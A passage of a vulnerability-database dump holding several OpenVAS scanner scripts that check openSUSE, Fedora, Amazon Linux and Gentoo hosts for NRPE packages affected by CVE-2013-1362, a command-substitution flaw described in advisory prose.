+0530 (Tue, 19 Nov 2013)\");\n script_cve_id(\"CVE-2013-1362\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SuSE Update for NRPE openSUSE-SU-2013:0621-1 (NRPE)\");\n\n tag_insight = \"\n NRPE (the Nagios Remote Plug-In Executor) allows the\n passing of $() to plugins/scripts which, if run under bash,\n will execute that shell command under a subprocess and pass\n the output as a parameter to the called script. Using this,\n it is possible to get called scripts, such as check_http,\n to execute arbitrary commands under the uid that\n NRPE/nagios is running as (typically, 'nagios').\n\n With this update NRPE will deny remote requests containing\n a bash command substitution.\";\n\n tag_affected = \"NRPE on openSUSE 12.2, openSUSE 12.1\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name: \"openSUSE-SU\", value: \"2013:0621_1\");\n script_summary(\"Check for the Version of NRPE\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe\", rpm:\"nagios-nrpe~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debuginfo\", rpm:\"nagios-nrpe-debuginfo~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debugsource\", rpm:\"nagios-nrpe-debugsource~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-doc\", rpm:\"nagios-nrpe-doc~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe\", rpm:\"nagios-plugins-nrpe~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe-debuginfo\", rpm:\"nagios-plugins-nrpe-debuginfo~2.12~30.9.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE12.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe\", rpm:\"nagios-nrpe~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debuginfo\", rpm:\"nagios-nrpe-debuginfo~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debugsource\", rpm:\"nagios-nrpe-debugsource~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-doc\", rpm:\"nagios-nrpe-doc~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe\", rpm:\"nagios-plugins-nrpe~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe-debuginfo\", rpm:\"nagios-plugins-nrpe-debuginfo~2.12~27.7.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-18T14:38:31", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-13T00:00:00", "id": "OPENVAS:1361412562310865802", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865802", "title": "Fedora Update for nrpe FEDORA-2013-9848", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nrpe FEDORA-2013-9848\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"nrpe on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865802\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-13 10:03:33 +0530 (Thu, 13 Jun 2013)\");\n script_cve_id(\"CVE-2013-1362\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"Fedora Update for nrpe FEDORA-2013-9848\");\n script_xref(name:\"FEDORA\", value:\"2013-9848\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-June/108468.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'nrpe'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"nrpe\", rpm:\"nrpe~2.14~3.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-18T14:39:34", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-06-13T00:00:00", "id": "OPENVAS:1361412562310865756", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865756", "title": "Fedora Update for nrpe FEDORA-2013-9836", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nrpe FEDORA-2013-9836\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.865756\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-13 10:02:15 +0530 (Thu, 13 Jun 2013)\");\n script_cve_id(\"CVE-2013-1362\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for nrpe FEDORA-2013-9836\");\n script_xref(name:\"FEDORA\", value:\"2013-9836\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-June/108442.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'nrpe'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"nrpe on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"nrpe\", rpm:\"nrpe~2.14~3.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-23T13:09:50", "bulletinFamily": "scanner", "description": "Check for the Version of NRPE", "modified": "2018-01-23T00:00:00", "published": "2013-11-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=850460", "id": "OPENVAS:850460", "title": "SuSE Update for NRPE openSUSE-SU-2013:0624-1 (NRPE)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0624_1.nasl 8494 2018-01-23 06:57:55Z teissa $\n#\n# SuSE Update for NRPE openSUSE-SU-2013:0624-1 (NRPE)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850460);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-19 14:05:50 +0530 (Tue, 19 Nov 2013)\");\n script_cve_id(\"CVE-2013-1362\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SuSE Update for NRPE openSUSE-SU-2013:0624-1 (NRPE)\");\n\n tag_insight = \"\n NRPE (the Nagios Remote Plug-In Executor) allows the\n passing of $() to plugins/scripts which, if run under bash,\n will execute that shell command under a subprocess and pass\n the output as a parameter to the called script. Using this,\n it is possible to get called scripts, such as check_http,\n to execute arbitrary commands under the uid that\n NRPE/nagios is running as (typically, 'nagios').\n\n With this update NRPE will deny remote requests\n containing a bash command substitution.\";\n\n tag_affected = \" NRPE on openSUSE 11.4\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name: \"openSUSE-SU\", value: \"2013:0624_1\");\n script_tag(name: \"summary\" , value: \"Check for the Version of NRPE\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe\", rpm:\"nagios-nrpe~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debuginfo\", rpm:\"nagios-nrpe-debuginfo~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debugsource\", rpm:\"nagios-nrpe-debugsource~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-doc\", rpm:\"nagios-nrpe-doc~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe\", rpm:\"nagios-plugins-nrpe~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe-debuginfo\", rpm:\"nagios-plugins-nrpe-debuginfo~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-19T13:04:37", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2013-11-19T00:00:00", "id": "OPENVAS:1361412562310850460", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850460", "title": "SuSE Update for NRPE openSUSE-SU-2013:0624-1 (NRPE)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0624_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for NRPE openSUSE-SU-2013:0624-1 (NRPE)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850460\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-19 14:05:50 +0530 (Tue, 19 Nov 2013)\");\n script_cve_id(\"CVE-2013-1362\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SuSE Update for NRPE openSUSE-SU-2013:0624-1 (NRPE)\");\n script_tag(name:\"affected\", value:\"NRPE on openSUSE 11.4\");\n script_tag(name:\"insight\", value:\"NRPE (the Nagios Remote Plug-In Executor) allows the\n passing of $() to plugins/scripts which, if run under bash,\n will execute that shell command under a subprocess and pass\n the output as a parameter to the called script. Using this,\n it is possible to get called scripts, such as check_http,\n to execute arbitrary commands under the uid that\n NRPE/nagios is running as (typically, 'nagios').\n\n With this update NRPE will deny remote requests\n containing a bash command substitution.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2013:0624_1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'NRPE'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe\", rpm:\"nagios-nrpe~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debuginfo\", rpm:\"nagios-nrpe-debuginfo~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-debugsource\", rpm:\"nagios-nrpe-debugsource~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-doc\", rpm:\"nagios-nrpe-doc~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe\", rpm:\"nagios-plugins-nrpe~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe-debuginfo\", rpm:\"nagios-plugins-nrpe-debuginfo~2.12~25.2\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:51:38", "bulletinFamily": "scanner", "description": "Check for the Version of nrpe", "modified": "2017-07-10T00:00:00", "published": "2013-06-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=865802", "id": "OPENVAS:865802", "title": "Fedora Update for nrpe FEDORA-2013-9848", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nrpe FEDORA-2013-9848\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Nrpe is a system daemon that will execute various Nagios plugins\n locally on behalf of a remote (monitoring) host that uses the\n check_nrpe plugin. Various plugins that can be executed by the\n daemon are available at:\n http://sourceforge.net/projects/nagiosplug\n\n This package provides the core agent.\";\n\n\ntag_solution = \"Please Install the Updated Packages.\";\ntag_affected = \"nrpe on Fedora 18\";\n\n\nif(description)\n{\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_id(865802);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-06-13 10:03:33 +0530 (Thu, 13 Jun 2013)\");\n script_cve_id(\"CVE-2013-1362\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_name(\"Fedora Update for nrpe FEDORA-2013-9848\");\n\n script_xref(name: \"FEDORA\", value: \"2013-9848\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-June/108468.html\");\n script_summary(\"Check for the Version of nrpe\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"nrpe\", rpm:\"nrpe~2.14~3.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T14:33:27", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120026", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120026", "title": "Amazon Linux Local Check: ALAS-2013-203", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2013-203.nasl 6577 2017-07-06 13:43:46Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120026\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:15:36 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2013-203\");\n script_tag(name:\"insight\", value:\"Incomplete blacklist vulnerability in nrpc.c in Nagios Remote Plug-In Executor (NRPE) before 2.14 might allow remote attackers to execute arbitrary shell commands via $() shell metacharacters, which are processed by bash.\");\n script_tag(name:\"solution\", value:\"Run yum update nrpe to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2013-203.html\");\n script_cve_id(\"CVE-2013-1362\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe\", rpm:\"nagios-plugins-nrpe~2.14~3.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"nrpe\", rpm:\"nrpe~2.14~3.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"nrpe-debuginfo\", rpm:\"nrpe-debuginfo~2.14~3.5.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-29T12:40:38", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201408-18", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121262", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121262", "title": "Gentoo Security Advisory GLSA 201408-18", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201408-18.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121262\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:49 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201408-18\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in NRPE. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201408-18\");\n script_cve_id(\"CVE-2013-1362\", \"CVE-2014-2913\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n 